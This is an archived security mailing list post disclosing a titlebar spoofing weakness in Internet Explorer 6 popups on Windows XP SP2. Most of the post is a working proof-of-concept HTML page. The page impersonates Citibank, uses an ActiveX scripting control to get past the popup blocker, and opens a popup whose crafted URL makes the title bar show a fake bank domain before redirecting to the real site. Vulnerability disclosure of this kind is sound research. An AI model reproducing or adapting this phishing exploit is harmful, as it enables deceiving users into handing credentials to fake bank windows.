lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <BAY16-F35ABE48C0B29011BC98C6CB9610@phx.gbl>
From: bitlance_3 at hotmail.com (bitlance winter)
Subject: WindowsXPSP2 script-initiated popup window
	titlebar spoofing

Hi LIST.

Windows XP SP2 forces the titlebar to be present in script-initiated 
Internet Explorer windows.
In the titlebar, domain name is listed before the page title.

Using magic DNS,this domain name can be exploited by malicious people to 
trick users into visiting a malicious popup window.
The weakness has been confirmed in version 6.0 on a fully patched system 
running Windows XP with SP2 installed.

Example:
- -----8<----- -----8<----- -----8<----- -----8<-----

[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
[!-- saved from url=(0014)about:internet -->
[html lang="x-klingon">
[head>
[title>Welcome to Citibank[/title>
[meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
[meta http-equiv="Content-Script-Type" content="text/javascript">

[script type="text/javascript">
[!-- Begin
function shellscript()
{
  window.focus();
  pURL = 'http://securelogin.citibank.com"+".e-gold.com/';
  sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,';
  sP += 'menubar=0,resizable=0,width=315,';
  sP += 'height=200,left = 250,top = 200'
  day = new Date();
  id = day.getTime();
  eval("page" + id + " = window.open(pURL, '" + id + "',sP);");
}

function main()
{
  targetURL = 'http://citibank.com/us/index.htm';
  x.DOM.Script.execScript(shellscript.toString());
  x.DOM.Script.setTimeout("shellscript()");
  location.replace(targetURL);
}

setTimeout(' main() ',1000);

// End -->
[/script>

[/head>

[object
	id="x"
	classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
	width="1"
	height="1"
	align="middle"
>
[param name="ActivateApplets" value="1">
[param name="ActivateActiveXControls" value="1">
[/object>

[/body>
[/html>

- -----8<----- -----8<----- -----8<----- -----8<-----

Reference:
http-equiv      (HOW TO BREAK XP SP2 POPUP BLOCKER)
  http://www.securityfocus.com/archive/1/384037


REGARDS.

--
bitlance winter

_________________________________________________________________
On the road to retirement? Check out MSN Life Events for advice on how to 
get there! http://lifeevents.msn.com/category.aspx?cid=Retirement

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ